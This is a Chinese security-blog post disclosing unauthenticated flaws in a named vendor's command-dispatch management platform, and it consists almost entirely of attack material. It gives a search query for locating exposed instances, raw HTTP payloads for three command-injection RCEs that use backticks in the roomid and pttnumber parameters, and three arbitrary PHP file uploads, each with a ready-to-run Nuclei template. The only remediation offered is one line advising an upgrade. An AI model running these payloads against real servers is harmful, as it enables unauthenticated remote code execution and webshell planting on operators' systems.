免责声明
由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!
一、简介
xxx指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。
二、漏洞描述
xxx指挥调度管理平台存在多处RCE、任意文件上传以及SQL注入等漏洞,未经身份认证的攻击者可通过上述等漏洞远程执行命令或写入后门等危害所导致服务器失陷。
三、复现环境
Query:body="指挥调度管理平台"Demo1:invite_one_member接口RCE
Payload1:
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}
Poc1:
id: 福建科立讯通信有限公司指挥调度管理平台RCE
info:
name: 福建科立讯通信有限公司指挥调度管理平台RCE
author: xxx
severity: high
description: description
reference:
- https://
metadata:
query: body="指挥调度管理平台"
tags:
requests:
- raw:
- |+
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}
- |
GET /api/client/audiobroadcast/1.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_2,"uid")
Example:
Demo2:invite2videoconf接口RCE
Payload2:
GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}
Poc2:
id: 2福建科立讯通信有限公司指挥调度管理平台RCE
info:
name: 2福建科立讯通信有限公司指挥调度管理平台RCE
author: xxx
severity: high
description: description
reference:
- https://
metadata:
query: body="指挥调度管理平台"
tags:
requests:
- raw:
- |+
GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}
- |
GET /api/client/1.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_2,"id")
Example:
Demo3:invite_one_ptter接口RCE
Payload3:
GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
Host: {{Hostname}}
Poc3:
id: 3福建科立讯通信有限公司指挥调度管理平台RCE
info:
name: 3福建科立讯通信有限公司指挥调度管理平台RCE
author: xxx
severity: high
description: description
reference:
- https://
metadata:
query: body="指挥调度管理平台"
tags:
requests:
- raw:
- |+
GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
Host: {{Hostname}}
- |
GET /api/client/ptt/1.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_2,"id")
Example:
Demo4:upload接口任意上传
Payload4:
POST /api/client/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 180
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarySwvD8hSn3Z0sHfMu
Content-Disposition: form-data; name="ulfile";filename="1.php"
Content-Type: image/png
111
------WebKitFormBoundarySwvD8hSn3Z0sHfMu--
Poc4:
id: 指挥调度管理平台api/client-Upload
info:
name: 指挥调度管理平台api/client-Upload
author: xxx
severity: info
description: description
reference:
- http://
tags: tags
requests:
- raw:
- |
POST /api/client/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 180
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarySwvD8hSn3Z0sHfMu
Content-Disposition: form-data; name="ulfile";filename="1.php"
Content-Type: image/png
111
------WebKitFormBoundarySwvD8hSn3Z0sHfMu--
- |
GET /upload/1.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '111'
- type: status
status:
- 200
Example:
Demo5:task-upload接口任意上传
Payload5:
POST /api/client/task/uploadfile.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
Content-Length: 374
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uuid"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="number"
122
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uploadfile";filename="1.php"
Content-Type: image/jpg
111
------WebKitFormBoundary25qW4eG1Jt50iyf7--
Poc5:
id: 指挥调度管理平台api/client/task/-Upload
info:
name: 指挥调度管理平台api/client/task/-Upload
author: xxx
severity: info
description: description
reference:
- http://
variables:
tags: tags
requests:
- raw:
- |-
POST /api/client/task/uploadfile.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
Content-Length: 374
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uuid"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="number"
122
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uploadfile";filename="1.php"
Content-Type: image/jpg
111
------WebKitFormBoundary25qW4eG1Jt50iyf7--
- |-
GET /upload/task/{{timestrp}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: timestrp
internal: true
part: body
regex:
- '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 111
- type: status
status:
- 200
Example:
Demo6:event/uploadfile接口任意上传
Payload6:
POST /api/client/event/uploadfile.php HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Length: 372
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uuid"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="number"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uploadfile";filename="1.php"
Content-Type: image/png
111
------WebKitFormBoundary25qW4eG1Jt50iyf7--
Poc6:
id: 指挥调度管理平台api/client/event-Uplaod
info:
name: 指挥调度管理平台api/client/event-Uplaod
author: xxx
severity: info
description: description
reference:
- http://
variables:
tags: tags
requests:
- raw:
- |-
POST /api/client/event/uploadfile.php HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Length: 372
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uuid"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="number"
1
------WebKitFormBoundary25qW4eG1Jt50iyf7
Content-Disposition: form-data; name="uploadfile";filename="1.php"
Content-Type: image/png
111
------WebKitFormBoundary25qW4eG1Jt50iyf7--
- |-
GET /upload/event/{{timestrp}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: timestrp
internal: true
part: body
regex:
- '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 111
- type: status
status:
- 200
写在最后
交个朋友~
修复建议:
升级至安全版本~
长按二维码识别关注
原文始发于微信公众号(零漏安全):某指挥调度管理平台存在多处漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论